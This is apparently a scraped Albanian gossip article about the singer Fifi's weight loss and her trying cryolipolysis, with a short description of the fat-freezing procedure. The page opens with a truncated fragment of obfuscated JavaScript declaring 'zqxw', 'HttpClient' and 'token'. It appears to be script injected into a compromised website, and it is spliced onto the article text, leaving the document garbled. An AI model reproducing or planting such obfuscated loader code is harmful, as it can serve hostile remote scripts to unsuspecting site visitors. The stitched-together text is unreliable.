;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Fifi s’heq dorë, përdor tjetër metodë për t’u dobësuar!

By

Fifi e arriti transformimin e madh ne peshë.

Ajo peshon sot shumë më pak se dikur.

View this post on Instagram

A post shared by FIFI (@fifi.official.fr)

Këtë e realizoi duke mos lënë metodë e teknikë pa provuar. E mesa duket, mbi të njëjtin parim po vazhdon edhe sot.

Këtë e ka lënë të kuptohet teksa provon një tjetër teknikë të quajtur kriolipolizë.

Ajo është teknikë e eliminimit të dhjamit pa intervenim përmes aplikimit të tretmanit me temperaturë shumë të ftohtë në zonën ku duhet.

Nëpërmjet kriolipolizës realizohet ftohje jo-invaziv e indit dhjamor që shërben për të nxitur lipolysis (shpërbërjen e qelizave dhjamore) pa dëmtuar indet e tjera. Rezultati i trajtimit është i dukshëm pas 2 deri në 4 muaj nga trajtimi, ku ju do të vini re reduktim të dhjamit në atë zonë.

Personat që kryejnë këtë trajtim kanë të përfshirë edhe seancat e trajtimit me Cavitazion dhe radiofrekuencë të cilat janë trajtime plotësuese për shkrirjen e mëtejshme të dhjamit në zonën ku është aplikuar kriolipoliza si dhe tonifikimin e lëkurës në atë zonë. Eliminimi i dhjamit pa kirurgji, pra CoolSculpting, është veçanërisht i prefereuar nga ata persona të cilët nuk dëshirojnë të kryejnë liposucion në trupin e tyre.

Teksa flet për procesin, Fifi është shprehur:

“Çfarëdo që ka me më ndihmu me u dobësu, do e bëj”

Përkundër se ne jemi të mahnitur me rezultatet e transformimit të Fifit, duket se këngëtarja do ende për të arritur atë që e konsideron si peshë/dukje ideale. /prive.al

Artikuj të ngjashëm